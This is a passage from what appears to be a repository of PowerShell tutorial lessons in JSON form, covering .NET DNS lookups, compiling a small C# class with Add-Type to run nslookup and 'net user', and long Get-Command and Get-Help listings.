VBoxMouse VirtualBox Guest Mouse Service\nRunning VBoxSF VirtualBox Shared Folders\nStopped VBoxVideo VBoxVideo\nRunning vdrvroot Microsoft Virtual Drive Enumerator ...\nStopped vga vga\nRunning VgaSave VgaSave\nStopped vhdmp vhdmp\nStopped viaagp VIA AGP Bus Filter\nStopped ViaC7 VIA C7 Processor Driver\nStopped viaide viaide\nStopped vmbus Virtual Machine Bus\nStopped VMBusHID VMBusHID\nRunning volmgr Volume Manager Driver\nRunning volmgrx Dynamic Volume Manager\nRunning volsnap Storage volumes\nStopped vsmraid vsmraid\nStopped vwifibus Virtual WiFi Bus Driver\nStopped WacomPen Wacom Serial Pen HID Driver\nStopped WANARP Remote Access IP ARP Driver\nRunning Wanarpv6 Remote Access IPv6 ARP Driver\nStopped Wd Wd\nRunning Wdf01000 Kernel Mode Driver Frameworks service\nRunning WfpLwf WFP Lightweight Filter\nStopped WIMMount WIMMount\nStopped WmiAcpi Microsoft Windows Management Interf...\nStopped ws2ifsl Winsock IFS Driver\nStopped WudfPf User Mode Driver Frameworks Platfor...\n\nPS C:\\>\n```\n\n###### Exercise\n\n- Explore the .Net assemblies and find one which deals with DNS. (–match is your friend)\n - [Dns Class](https://msdn.microsoft.com/en-us/library/system.net.dns(v=vs.110).aspx)\r- Explore the class and do a DNS lookup using a static method (or otherwise)\n\n```Solution```\n\n- ```Add-Type``` Cmdlet with ```AssemblyName``` ```System.Net```\n\n```PowerShell\nPS C:\\> Add-Type -AssemblyName System.Net\n```\n\n- Check if ```System.Net.Dns``` is loaded\n\n```PowerShell\nPS C:\\> [System.Net.Dns]\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue False Dns System.Object\n\nPS C:\\>\n```\n\n- List ```Static``` members of ```System.Net.Dns```\n\n```PowerShell\nPS C:\\> [System.Net.Dns] | Get-Member -Static\n\n TypeName: System.Net.Dns\n\nName MemberType Definition\n---- ---------- ----------\nBeginGetHostAddresses Method static System.IAsyncResult BeginGetHostAddresses(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object state)\nBeginGetHostByName Method static System.IAsyncResult BeginGetHostByName(string hostName, System.AsyncCallback requestCallback, System.Object stateObject)\nBeginGetHostEntry Method static System.IAsyncResult BeginGetHostEntry(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object stateObject), static System.IAsyncResult BeginGetHostEntry(ipaddress address, System.AsyncCallback requestCallback, System.Object stateObject)\nBeginResolve Method static System.IAsyncResult BeginResolve(string hostName, System.AsyncCallback requestCallback, System.Object stateObject)\nEndGetHostAddresses Method static ipaddress[] EndGetHostAddresses(System.IAsyncResult asyncResult)\nEndGetHostByName Method static System.Net.IPHostEntry EndGetHostByName(System.IAsyncResult asyncResult)\nEndGetHostEntry Method static System.Net.IPHostEntry EndGetHostEntry(System.IAsyncResult asyncResult)\nEndResolve Method static System.Net.IPHostEntry EndResolve(System.IAsyncResult asyncResult)\nEquals Method static bool Equals(System.Object objA, System.Object objB)\nGetHostAddresses Method static ipaddress[] GetHostAddresses(string hostNameOrAddress)\nGetHostByAddress Method static System.Net.IPHostEntry GetHostByAddress(string address), static System.Net.IPHostEntry GetHostByAddress(ipaddress address)\nGetHostByName Method static System.Net.IPHostEntry GetHostByName(string hostName)\nGetHostEntry Method static System.Net.IPHostEntry GetHostEntry(string hostNameOrAddress), static System.Net.IPHostEntry GetHostEntry(ipaddress address)\nGetHostName Method static string GetHostName()\nReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB)\nResolve Method static System.Net.IPHostEntry Resolve(string hostName)\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> [System.Net.Dns] | Get-Member -Static | Format-List *\n\nTypeName : System.Net.Dns\nName : BeginGetHostAddresses\nMemberType : Method\nDefinition : static System.IAsyncResult BeginGetHostAddresses(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object state)\n\nTypeName : System.Net.Dns\nName : BeginGetHostByName\nMemberType : Method\nDefinition : static System.IAsyncResult BeginGetHostByName(string hostName, System.AsyncCallback requestCallback, System.Object stateObject)\n\nTypeName : System.Net.Dns\nName : BeginGetHostEntry\nMemberType : Method\nDefinition : static System.IAsyncResult BeginGetHostEntry(string hostNameOrAddress, System.AsyncCallback requestCallback, System.Object stateObject), static System.IAsyncResult BeginGetHostEntry(ipaddress address, System.AsyncCallback requestCallback, System.Object stateObject)\n\nTypeName : System.Net.Dns\nName : BeginResolve\nMemberType : Method\nDefinition : static System.IAsyncResult BeginResolve(string hostName, System.AsyncCallback requestCallback, System.Object stateObject)\n\nTypeName : System.Net.Dns\nName : EndGetHostAddresses\nMemberType : Method\nDefinition : static ipaddress[] EndGetHostAddresses(System.IAsyncResult asyncResult)\n\nTypeName : System.Net.Dns\nName : EndGetHostByName\nMemberType : Method\nDefinition : static System.Net.IPHostEntry EndGetHostByName(System.IAsyncResult asyncResult)\n\nTypeName : System.Net.Dns\nName : EndGetHostEntry\nMemberType : Method\nDefinition : static System.Net.IPHostEntry EndGetHostEntry(System.IAsyncResult asyncResult)\n\nTypeName : System.Net.Dns\nName : EndResolve\nMemberType : Method\nDefinition : static System.Net.IPHostEntry EndResolve(System.IAsyncResult asyncResult)\n\nTypeName : System.Net.Dns\nName : Equals\nMemberType : Method\nDefinition : static bool Equals(System.Object objA, System.Object objB)\n\nTypeName : System.Net.Dns\nName : GetHostAddresses\nMemberType : Method\nDefinition : static ipaddress[] GetHostAddresses(string hostNameOrAddress)\n\nTypeName : System.Net.Dns\nName : GetHostByAddress\nMemberType : Method\nDefinition : static System.Net.IPHostEntry GetHostByAddress(string address), static System.Net.IPHostEntry GetHostByAddress(ipaddress address)\n\nTypeName : System.Net.Dns\nName : GetHostByName\nMemberType : Method\nDefinition : static System.Net.IPHostEntry GetHostByName(string hostName)\n\nTypeName : System.Net.Dns\nName : GetHostEntry\nMemberType : Method\nDefinition : static System.Net.IPHostEntry GetHostEntry(string hostNameOrAddress), static System.Net.IPHostEntry GetHostEntry(ipaddress address)\n\nTypeName : System.Net.Dns\nName : GetHostName\nMemberType : Method\nDefinition : static string GetHostName()\n\nTypeName : System.Net.Dns\nName : ReferenceEquals\nMemberType : Method\nDefinition : static bool ReferenceEquals(System.Object objA, System.Object objB)\n\nTypeName : System.Net.Dns\nName : Resolve\nMemberType : Method\nDefinition : static System.Net.IPHostEntry Resolve(string hostName)\n\nPS C:\\>\n```\n\n- Use ```GetHostAddresses ``` ```Static``` member\n\n```PowerShell\nPS C:\\> [System.Net.Dns]::GetHostAddresses(\"www.google.com\")\n\nAddress :\nAddressFamily : InterNetworkV6\nScopeId : 0\nIsIPv6Multicast : False\nIsIPv6LinkLocal : False\nIsIPv6SiteLocal : False\nIPAddressToString : 2607:f8b0:4005:809::2004\n\nAddress : 604428716\nAddressFamily : InterNetwork\nScopeId :\nIsIPv6Multicast : False\nIsIPv6LinkLocal : False\nIsIPv6SiteLocal : False\nIPAddressToString : 172.217.6.36\n\nPS C:\\>\n```" }, { "path": "29-Using-NET-in-Powershell-Part-3.md", "content": "#### 29. Using .NET in Powershell Part 3\n\n\n###### Add-Type\r\r- Use ```Add-Type``` with ```-FromSource```\n- ```New-Object```\n\n```Invoke-SysCommands.ps1```\n\n```PowerShell\n$DotnetCode = @\"\r\npublic class SysCommands\r\n{\r\n\r\n public static void lookup(string domainname)\r\n {\r\n System.Diagnostics.Process.Start(\"nslookup.exe\",domainname);\r\n }\r\n\r\n public void netcmd (string cmd)\r\n {\r\n string cmdstring = \"/k net.exe \" + cmd;\r\n System.Diagnostics.Process.Start(\"cmd.exe\",cmdstring);\r\n }\r\n\r\n}\r\n\"@\r\n\r\nAdd-Type -TypeDefinition $DotnetCode\r\n#[SysCommands]::lookup(\"google.com\")\r\n\r\n$obj = New-Object SysCommands\r\n$obj.netcmd(\"user\")\n```\n\n![Image of SysCommands](images/5.jpeg)" }, { "path": "3-Exploring-and-using-Cmdlets.md", "content": "#### 3. Exploring and using Cmdlets\n\n- ```Get-Help``` for ```Get-Command``` Cmdlets\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Help Get-Command\n\nNAME\n Get-Command\n\nSYNOPSIS\n Gets basic information about cmdlets and other elements of Windows PowerShell commands.\n\n\nSYNTAX\n Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application |\n Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [\n ]\n\n Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot\n alCount ] []\n\n\nDESCRIPTION\n The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th\n e session, such as aliases, functions, filters, scripts, and applications.\n\n Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge\n ts its information from help topic files.\n\n Without parameters, \"Get-Command\" gets all of the cmdlets and functions in the current session. \"Get-Command *\" get\n s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en\n v:path). It groups the files in the \"Application\" command type.\n\n You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win\n dows PowerShell snap-in or importing a module.\n\n\nRELATED LINKS\n Online version: http://go.microsoft.com/fwlink/?LinkID=113309\n about_Command_Precedence\n Get-Help\n Get-PSDrive\n Get-Member\n Import-PSSession\n Export-PSSession\n\nREMARKS\n To see the examples, type: \"get-help Get-Command -examples\".\n For more information, type: \"get-help Get-Command -detailed\".\n For technical information, type: \"get-help Get-Command -full\".\n\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- ```Get-Command``` Cmdlets\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command\n\nCommandType Name Definition\n----------- ---- ----------\nAlias % ForEach-Object\nAlias ? Where-Object\nFunction A: Set-Location A:\nAlias ac Add-Content\nCmdlet Add-Computer Add-Computer [-DomainName] [-Credential...\nCmdlet Add-Content Add-Content [-Path] [-Value] ] [-Pass...\nCmdlet Add-Member Add-Member [-MemberType] [-Name]...\nCmdlet Add-PSSnapin Add-PSSnapin [-Name] [-PassThru] [-Ve...\nCmdlet Add-Type Add-Type [-TypeDefinition] [-Language <...\nAlias asnp Add-PSSnapIn\nFunction B: Set-Location B:\nFunction C: Set-Location C:\nAlias cat Get-Content\nAlias cd Set-Location\nFunction cd.. Set-Location ..\nFunction cd\\ Set-Location \\\nAlias chdir Set-Location\nCmdlet Checkpoint-Computer Checkpoint-Computer [-Description] [[-R...\nAlias clc Clear-Content\nAlias clear Clear-Host\nCmdlet Clear-Content Clear-Content [-Path] [-Filter [[-Computer...\nCmdlet Clear-History Clear-History [[-Id] ] [[-Count] [-Force] [-Filter ...\nCmdlet Clear-ItemProperty Clear-ItemProperty [-Path] [-Name] [-Include [...\nCmdlet Complete-Transaction Complete-Transaction [-Verbose] [-Debug] [-Error...\nCmdlet Connect-WSMan Connect-WSMan [[-ComputerName] ] [-Appli...\nCmdlet ConvertFrom-Csv ConvertFrom-Csv [-InputObject] [[-D...\nCmdlet ConvertFrom-SecureString ConvertFrom-SecureString [-SecureString] [-...\nCmdlet Convert-Path Convert-Path [-Path] [-Verbose] [-Deb...\nCmdlet ConvertTo-Csv ConvertTo-Csv [-InputObject] [[-Delim...\nCmdlet ConvertTo-Html ConvertTo-Html [[-Property] ] [[-Head]...\nCmdlet ConvertTo-SecureString ConvertTo-SecureString [-String] [[-Sec...\nCmdlet ConvertTo-Xml ConvertTo-Xml [-InputObject] [-Depth ...\nAlias copy Copy-Item\nCmdlet Copy-Item Copy-Item [-Path] [[-Destination] [-Destinati...\nAlias cp Copy-Item\nAlias cpi Copy-Item\nAlias cpp Copy-ItemProperty\nAlias cvpa Convert-Path\nFunction D: Set-Location D:\nAlias dbp Disable-PSBreakpoint\nCmdlet Debug-Process Debug-Process [-Name] [-Verbose] [-De...\nAlias del Remove-Item\nAlias diff Compare-Object\nAlias dir Get-ChildItem\nCmdlet Disable-ComputerRestore Disable-ComputerRestore [-Drive] [-Ve...\nCmdlet Disable-PSBreakpoint Disable-PSBreakpoint [-Breakpoint] [-Verbose]...\nCmdlet Disconnect-WSMan Disconnect-WSMan [[-ComputerName] ] [-Ve...\nFunction E: Set-Location E:\nAlias ebp Enable-PSBreakpoint\nAlias echo Write-Output\nCmdlet Enable-ComputerRestore Enable-ComputerRestore [-Drive] [-Ver...\nCmdlet Enable-PSBreakpoint Enable-PSBreakpoint [-Id] [-PassThru] ...\nCmdlet Enable-PSRemoting Enable-PSRemoting [-Force] [-Verbose] [-Debug] [...\nCmdlet Enable-PSSessionConfiguration Enable-PSSessionConfiguration [[-Name] [[-Delegate...\nCmdlet Enter-PSSession Enter-PSSession [-ComputerName] [-Crede...\nAlias epal Export-Alias\nAlias epcsv Export-Csv\nAlias epsn Export-PSSession\nAlias erase Remove-Item\nAlias etsn Enter-PSSession\nCmdlet Exit-PSSession Exit-PSSession [-Verbose] [-Debug] [-ErrorAction...\nCmdlet Export-Alias Export-Alias [-Path] [[-Name] [-Depth ] ...\nCmdlet Export-Console Export-Console [[-Path] ] [-Force] [-NoC...\nCmdlet Export-Counter Export-Counter [-Path] [-FileFormat [[-Delimiter] ...\nCmdlet Export-FormatData Export-FormatData [-InputObject ] [-C...\nCmdlet Export-PSSession Export-PSSession [-Session] [-Output...\nAlias exsn Exit-PSSession\nFunction F: Set-Location F:\nAlias fc Format-Custom\nAlias fl Format-List\nAlias foreach ForEach-Object\nCmdlet ForEach-Object ForEach-Object [-Process] [-Inpu...\nCmdlet Format-Custom Format-Custom [[-Property] ] [-Depth <...\nCmdlet Format-List Format-List [[-Property] ] [-GroupBy <...\nCmdlet Format-Table Format-Table [[-Property] ] [-AutoSize...\nCmdlet Format-Wide Format-Wide [[-Property] ] [-AutoSize] [...\nAlias ft Format-Table\nAlias fw Format-Wide\nFunction G: Set-Location G:\nAlias gal Get-Alias\nAlias gbp Get-PSBreakpoint\nAlias gc Get-Content\nAlias gci Get-ChildItem\nAlias gcm Get-Command\nAlias gcs Get-PSCallStack\nAlias gdr Get-PSDrive\nCmdlet Get-Acl Get-Acl [[-Path] ] [-Audit] [-Filter <...\nCmdlet Get-Alias Get-Alias [[-Name] ] [-Exclude ...\nCmdlet Get-ChildItem Get-ChildItem [[-Path] ] [[-Filter] ] [-Verb ...\nCmdlet Get-ComputerRestorePoint Get-ComputerRestorePoint [[-RestorePoint] [-ReadCount ] [-SampleInte...\nCmdlet Get-Credential Get-Credential [-Credential] [-Ve...\nCmdlet Get-Culture Get-Culture [-Verbose] [-Debug] [-ErrorAction ] [-Year ] [-...\nCmdlet Get-Event Get-Event [[-SourceIdentifier] ] [-Verbo...\nCmdlet Get-EventLog Get-EventLog [-LogName] [[-InstanceId] ...\nCmdlet Get-EventSubscriber Get-EventSubscriber [[-SourceIdentifier] ] [-Verbos...\nCmdlet Get-Help Get-Help [[-Name] ] [-Path ] [-C...\nCmdlet Get-History Get-History [[-Id] ] [[-Count] ]...\nCmdlet Get-Host Get-Host [-Verbose] [-Debug] [-ErrorAction ] [-ComputerName [-Filter ] [...\nCmdlet Get-ItemProperty Get-ItemProperty [-Path] [[-Name] ] [-Verbose] [-Debug] [-...\nCmdlet Get-Location Get-Location [-PSProvider ] [-PSDrive ...\nCmdlet Get-Member Get-Member [[-Name] ] [-InputObject ] [-All] [-Verbose...\nCmdlet Get-PfxCertificate Get-PfxCertificate [-FilePath] [-Verb...\nCmdlet Get-Process Get-Process [[-Name] ] [-ComputerName ...\nCmdlet Get-PSBreakpoint Get-PSBreakpoint [[-Script] ] [-Verbos...\nCmdlet Get-PSCallStack Get-PSCallStack [-Verbose] [-Debug] [-ErrorActio...\nCmdlet Get-PSDrive Get-PSDrive [[-Name] ] [-Scope ] [-Verb...\nCmdlet Get-PSSession Get-PSSession [[-ComputerName] ] [-Ver...\nCmdlet Get-PSSessionConfiguration Get-PSSessionConfiguration [[-Name] ] ...\nCmdlet Get-PSSnapin Get-PSSnapin [[-Name] ] [-Registered] ...\nCmdlet Get-Random Get-Random [[-Maximum] ] [-SetSeed ] [-ComputerName ...\nCmdlet Get-TraceSource Get-TraceSource [[-Name] ] [-Verbose] ...\nCmdlet Get-Transaction Get-Transaction [-Verbose] [-Debug] [-ErrorActio...\nCmdlet Get-UICulture Get-UICulture [-Verbose] [-Debug] [-ErrorAction ...\nCmdlet Get-Unique Get-Unique [-InputObject ] [-AsString]...\nCmdlet Get-Variable Get-Variable [[-Name] ] [-ValueOnly] [...\nFunction Get-Verb ...\nCmdlet Get-WinEvent Get-WinEvent [[-LogName] ] [-MaxEvents...\nCmdlet Get-WmiObject Get-WmiObject [-Class] [[-Property] [-Applica...\nAlias ghy Get-History\nAlias gi Get-Item\nAlias gjb Get-Job\nAlias gl Get-Location\nAlias gm Get-Member\nAlias gmo Get-Module\nAlias gp Get-ItemProperty\nAlias gps Get-Process\nAlias group Group-Object\nCmdlet Group-Object Group-Object [[-Property] ] [-NoElemen...\nAlias gsn Get-PSSession\nAlias gsnp Get-PSSnapIn\nAlias gsv Get-Service\nAlias gu Get-Unique\nAlias gv Get-Variable\nAlias gwmi Get-WmiObject\nAlias h Get-History\nFunction H: Set-Location H:\nFunction help ...\nAlias history Get-History\nFunction I: Set-Location I:\nAlias icm Invoke-Command\nAlias iex Invoke-Expression\nAlias ihy Invoke-History\nAlias ii Invoke-Item\nCmdlet Import-Alias Import-Alias [-Path] [-Scope ] ...\nCmdlet Import-Clixml Import-Clixml [-Path] [-Verbose] [-De...\nCmdlet Import-Counter Import-Counter [-Path] [-StartTime [[-Delimiter] ...\nCmdlet Import-Module Import-Module [-Name] [-Global] [-Pre...\nCmdlet Import-PSSession Import-PSSession [-Session] [[-Comma...\nFunction ImportSystemModules ...\nCmdlet Invoke-Command Invoke-Command [-ScriptBlock] [-In...\nCmdlet Invoke-Expression Invoke-Expression [-Command] [-Verbose]...\nCmdlet Invoke-History Invoke-History [[-Id] ] [-Verbose] [-Deb...\nCmdlet Invoke-Item Invoke-Item [-Path] [-Filter ...\nCmdlet Invoke-WmiMethod Invoke-WmiMethod [-Class] [-Name] [-Action...\nAlias ipal Import-Alias\nAlias ipcsv Import-Csv\nAlias ipmo Import-Module\nAlias ipsn Import-PSSession\nAlias ise powershell_ise.exe\nAlias iwmi Invoke-WMIMethod\nFunction J: Set-Location J:\nCmdlet Join-Path Join-Path [-Path] [-ChildPath] [-ComputerN...\nAlias lp Out-Printer\nAlias ls Get-ChildItem\nFunction M: Set-Location M:\nAlias man help\nAlias md mkdir\nAlias measure Measure-Object\nCmdlet Measure-Command Measure-Command [-Expression] [-In...\nCmdlet Measure-Object Measure-Object [[-Property] ] [-InputO...\nAlias mi Move-Item\nFunction mkdir ...\nFunction more param([string[]]$paths)...\nAlias mount New-PSDrive\nAlias move Move-Item\nCmdlet Move-Item Move-Item [-Path] [[-Destination] [-Destinati...\nAlias mp Move-ItemProperty\nAlias mv Move-Item\nFunction N: Set-Location N:\nAlias nal New-Alias\nAlias ndr New-PSDrive\nCmdlet New-Alias New-Alias [-Name] [-Value] [-D...\nCmdlet New-Event New-Event [-SourceIdentifier] [[-Sender...\nCmdlet New-EventLog New-EventLog [-LogName] [-Source] [-ItemType ]...\nCmdlet New-ItemProperty New-ItemProperty [-Path] [-Name] [-Functi...\nCmdlet New-ModuleManifest New-ModuleManifest [-Path] -NestedModul...\nCmdlet New-Object New-Object [-TypeName] [[-ArgumentList]...\nCmdlet New-PSDrive New-PSDrive [-Name] [-PSProvider] ] [-Cre...\nCmdlet New-PSSessionOption New-PSSessionOption [-MaximumRedirection ...\nCmdlet New-Service New-Service [-Name] [-BinaryPathName] <...\nCmdlet New-TimeSpan New-TimeSpan [[-Start] ] [[-End] [[-Value] ...\nCmdlet New-WebServiceProxy New-WebServiceProxy [-Uri] [[-Class] [-Selecto...\nCmdlet New-WSManSessionOption New-WSManSessionOption [-ProxyAccessType ] [-Verbose]...\nCmdlet Out-File Out-File [-FilePath] [[-Encoding] ] [-Title <...\nCmdlet Out-Host Out-Host [-Paging] [-InputObject ] [-V...\nCmdlet Out-Null Out-Null [-InputObject ] [-Verbose] [-...\nCmdlet Out-Printer Out-Printer [[-Name] ] [-InputObject ] [-InputObj...\nFunction P: Set-Location P:\nAlias popd Pop-Location\nCmdlet Pop-Location Pop-Location [-PassThru] [-StackName ] [...\nFunction prompt $(if (test-path variable:/PSDebugContext) { '[DB...\nAlias ps Get-Process\nAlias pushd Push-Location\nCmdlet Push-Location Push-Location [[-Path] ] [-PassThru] [-S...\nAlias pwd Get-Location\nFunction Q: Set-Location Q:\nAlias r Invoke-History\nFunction R: Set-Location R:\nAlias rbp Remove-PSBreakpoint\nAlias rcjb Receive-Job\nAlias rd Remove-Item\nAlias rdr Remove-PSDrive\nCmdlet Read-Host Read-Host [[-Prompt] ] [-AsSecureString]...\nCmdlet Receive-Job Receive-Job [-Job] [[-Location] [...\nCmdlet Register-PSSessionConfiguration Register-PSSessionConfiguration [-Name] ...\nCmdlet Register-WmiEvent Register-WmiEvent [-Class] [[-SourceIde...\nCmdlet Remove-Computer Remove-Computer [[-Credential] ] [...\nCmdlet Remove-Event Remove-Event [-SourceIdentifier] [-Verb...\nCmdlet Remove-EventLog Remove-EventLog [-LogName] [[-Compute...\nCmdlet Remove-Item Remove-Item [-Path] [-Filter ...\nCmdlet Remove-ItemProperty Remove-ItemProperty [-Path] [-Name] <...\nCmdlet Remove-Job Remove-Job [-Id] [-Force] [-Verbose] [...\nCmdlet Remove-Module Remove-Module [-Name] [-Force] [-Verb...\nCmdlet Remove-PSBreakpoint Remove-PSBreakpoint [-Breakpoint] ...\nCmdlet Remove-PSDrive Remove-PSDrive [-Name] [-PSProvider <...\nCmdlet Remove-PSSession Remove-PSSession [-Id] [-Verbose] [-De...\nCmdlet Remove-PSSnapin Remove-PSSnapin [-Name] [-PassThru] [...\nCmdlet Remove-Variable Remove-Variable [-Name] [-Include [-AsJob] [-Im...\nCmdlet Remove-WSManInstance Remove-WSManInstance [-ResourceURI] [-Sele...\nAlias ren Rename-Item\nCmdlet Rename-Item Rename-Item [-Path] [-NewName] ...\nCmdlet Rename-ItemProperty Rename-ItemProperty [-Path] [-Name] ]...\nCmdlet Resolve-Path Resolve-Path [-Path] [-Relative] [-Cr...\nCmdlet Restart-Computer Restart-Computer [[-ComputerName] ] [[...\nCmdlet Restart-Service Restart-Service [-Name] [-Force] [-Pa...\nCmdlet Restore-Computer Restore-Computer [-RestorePoint] [-Verbo...\nCmdlet Resume-Service Resume-Service [-Name] [-PassThru] [-...\nAlias ri Remove-Item\nAlias rjb Remove-Job\nAlias rm Remove-Item\nAlias rmdir Remove-Item\nAlias rmo Remove-Module\nAlias rni Rename-Item\nAlias rnp Rename-ItemProperty\nAlias rp Remove-ItemProperty\nAlias rsn Remove-PSSession\nAlias rsnp Remove-PSSnapin\nAlias rv Remove-Variable\nAlias rvpa Resolve-Path\nAlias rwmi Remove-WMIObject\nFunction S: Set-Location S:\nAlias sajb Start-Job\nAlias sal Set-Alias\nAlias saps Start-Process\nAlias sasv Start-Service\nAlias sbp Set-PSBreakpoint\nAlias sc Set-Content\nAlias select Select-Object\nCmdlet Select-Object Select-Object [[-Property] ] [-InputOb...\nCmdlet Select-String Select-String [-Pattern] -InputObject...\nCmdlet Select-Xml Select-Xml [-XPath] [-Xml] ...\nCmdlet Send-MailMessage Send-MailMessage [-To] [-Subject] [-AclObject] [-Value] [-D...\nCmdlet Set-AuthenticodeSignature Set-AuthenticodeSignature [-FilePath] ...\nCmdlet Set-Content Set-Content [-Path] [-Value] [-DisplayHint [[-Value] ] ...\nCmdlet Set-ItemProperty Set-ItemProperty [-Path] [-Name] ] [-PassThru] [-Ve...\nCmdlet Set-PSBreakpoint Set-PSBreakpoint [-Script] [-Line] ] [-Step] [-Strict] [...\nCmdlet Set-PSSessionConfiguration Set-PSSessionConfiguration [-Name] [-Ap...\nCmdlet Set-Service Set-Service [-Name] [-ComputerName [-Verbose] [-D...\nCmdlet Set-TraceSource Set-TraceSource [-Name] [[-Option] [[-Value] [[-Arguments] ...\nCmdlet Set-WSManInstance Set-WSManInstance [-ResourceURI] [[-Select...\nCmdlet Set-WSManQuickConfig Set-WSManQuickConfig [-UseSSL] [-Force] [-Verbos...\nCmdlet Show-EventLog Show-EventLog [[-ComputerName] ] [-Verbo...\nAlias si Set-Item\nAlias sl Set-Location\nAlias sleep Start-Sleep\nAlias sort Sort-Object\nCmdlet Sort-Object Sort-Object [[-Property] ] [-Descendin...\nAlias sp Set-ItemProperty\nAlias spjb Stop-Job\nCmdlet Split-Path Split-Path [-Path] [-LiteralPath [[-Initia...\nCmdlet Start-Process Start-Process [-FilePath] [[-ArgumentLi...\nCmdlet Start-Service Start-Service [-Name] [-PassThru] [-I...\nCmdlet Start-Sleep Start-Sleep [-Seconds] [-Verbose] [-Debu...\nCmdlet Start-Transaction Start-Transaction [-Timeout ] [-Independe...\nCmdlet Start-Transcript Start-Transcript [[-Path] ] [-Append] [-...\nCmdlet Stop-Computer Stop-Computer [[-ComputerName] ] [[-Cr...\nCmdlet Stop-Job Stop-Job [-Id] [-PassThru] [-Verbose] ...\nCmdlet Stop-Process Stop-Process [-Id] [-PassThru] [-Force...\nCmdlet Stop-Service Stop-Service [-Name] [-Force] [-PassT...\nCmdlet Stop-Transcript Stop-Transcript [-Verbose] [-Debug] [-ErrorActio...\nCmdlet Suspend-Service Suspend-Service [-Name] [-PassThru] [...\nAlias sv Set-Variable\nAlias swmi Set-WMIInstance\nFunction T: Set-Location T:\nFunction TabExpansion ...\nAlias tee Tee-Object\nCmdlet Tee-Object Tee-Object [-FilePath] [-InputObject [[-So...\nCmdlet Test-ModuleManifest Test-ModuleManifest [-Path] [-Verbose] ...\nCmdlet Test-Path Test-Path [-Path] [-Filter ] ...\nCmdlet Test-WSMan Test-WSMan [[-ComputerName] ] [-Authenti...\nCmdlet Trace-Command Trace-Command [-Name] [-Expression] <...\nAlias type Get-Content\nFunction U: Set-Location U:\nCmdlet Undo-Transaction Undo-Transaction [-Verbose] [-Debug] [-ErrorActi...\nCmdlet Unregister-Event Unregister-Event [-SourceIdentifier] [-...\nCmdlet Unregister-PSSessionConfiguration Unregister-PSSessionConfiguration [-Name] ] [-P...\nCmdlet Update-List Update-List [[-Property] ] [-Add ] [-Pre...\nCmdlet Use-Transaction Use-Transaction [-TransactedScript] ] [-Time...\nCmdlet Wait-Job Wait-Job [-Id] [-Any] [-Timeout [[-Timeout] [-Inp...\nAlias wjb Wait-Job\nAlias write Write-Output\nCmdlet Write-Debug Write-Debug [-Message] [-Verbose] [-Deb...\nCmdlet Write-Error Write-Error [-Message] [-Category [-Source] ] [-NoNewline] [-S...\nCmdlet Write-Output Write-Output [-InputObject] [-Verbo...\nCmdlet Write-Progress Write-Progress [-Activity] [-Status] [-Verbose] [-D...\nCmdlet Write-Warning Write-Warning [-Message] [-Verbose] [-D...\nFunction X: Set-Location X:\nFunction Y: Set-Location Y:\nFunction Z: Set-Location Z:\n\n\nPS C:\\Users\\Windows-32>\n```\n\n- Make ```Get-Command``` to only lists ```Cmdlet```\n\n```Powershell\nPS C:\\Users\\Windows-32> Get-Command -CommandType cmdlet\n\nCommandType Name Definition\n----------- ---- ----------\nCmdlet Add-Computer Add-Computer [-DomainName] [-Credential...\nCmdlet Add-Content Add-Content [-Path] [-Value] ] [-Pass...\nCmdlet Add-Member Add-Member [-MemberType] [-Name]...\nCmdlet Add-PSSnapin Add-PSSnapin [-Name] [-PassThru] [-Ve...\nCmdlet Add-Type Add-Type [-TypeDefinition] [-Language <...\nCmdlet Checkpoint-Computer Checkpoint-Computer [-Description] [[-R...\nCmdlet Clear-Content Clear-Content [-Path] [-Filter [[-Computer...\nCmdlet Clear-History Clear-History [[-Id] ] [[-Count] [-Force] [-Filter ...\nCmdlet Clear-ItemProperty Clear-ItemProperty [-Path] [-Name] [-Include [...\nCmdlet Complete-Transaction Complete-Transaction [-Verbose] [-Debug] [-Error...\nCmdlet Connect-WSMan Connect-WSMan [[-ComputerName] ] [-Appli...\nCmdlet ConvertFrom-Csv ConvertFrom-Csv [-InputObject] [[-D...\nCmdlet ConvertFrom-SecureString ConvertFrom-SecureString [-SecureString] [-...\nCmdlet Convert-Path Convert-Path [-Path] [-Verbose] [-Deb...\nCmdlet ConvertTo-Csv ConvertTo-Csv [-InputObject] [[-Delim...\nCmdlet ConvertTo-Html ConvertTo-Html [[-Property] ] [[-Head]...\nCmdlet ConvertTo-SecureString ConvertTo-SecureString [-String] [[-Sec...\nCmdlet ConvertTo-Xml ConvertTo-Xml [-InputObject] [-Depth ...\nCmdlet Copy-Item Copy-Item [-Path] [[-Destination] [-Destinati...\nCmdlet Debug-Process Debug-Process [-Name] [-Verbose] [-De...\nCmdlet Disable-ComputerRestore Disable-ComputerRestore [-Drive] [-Ve...\nCmdlet Disable-PSBreakpoint Disable-PSBreakpoint [-Breakpoint] [-Verbose]...\nCmdlet Disconnect-WSMan Disconnect-WSMan [[-ComputerName] ] [-Ve...\nCmdlet Enable-ComputerRestore Enable-ComputerRestore [-Drive] [-Ver...\nCmdlet Enable-PSBreakpoint Enable-PSBreakpoint [-Id] [-PassThru] ...\nCmdlet Enable-PSRemoting Enable-PSRemoting [-Force] [-Verbose] [-Debug] [...\nCmdlet Enable-PSSessionConfiguration Enable-PSSessionConfiguration [[-Name] [[-Delegate...\nCmdlet Enter-PSSession Enter-PSSession [-ComputerName] [-Crede...\nCmdlet Exit-PSSession Exit-PSSession [-Verbose] [-Debug] [-ErrorAction...\nCmdlet Export-Alias Export-Alias [-Path] [[-Name] [-Depth ] ...\nCmdlet Export-Console Export-Console [[-Path] ] [-Force] [-NoC...\nCmdlet Export-Counter Export-Counter 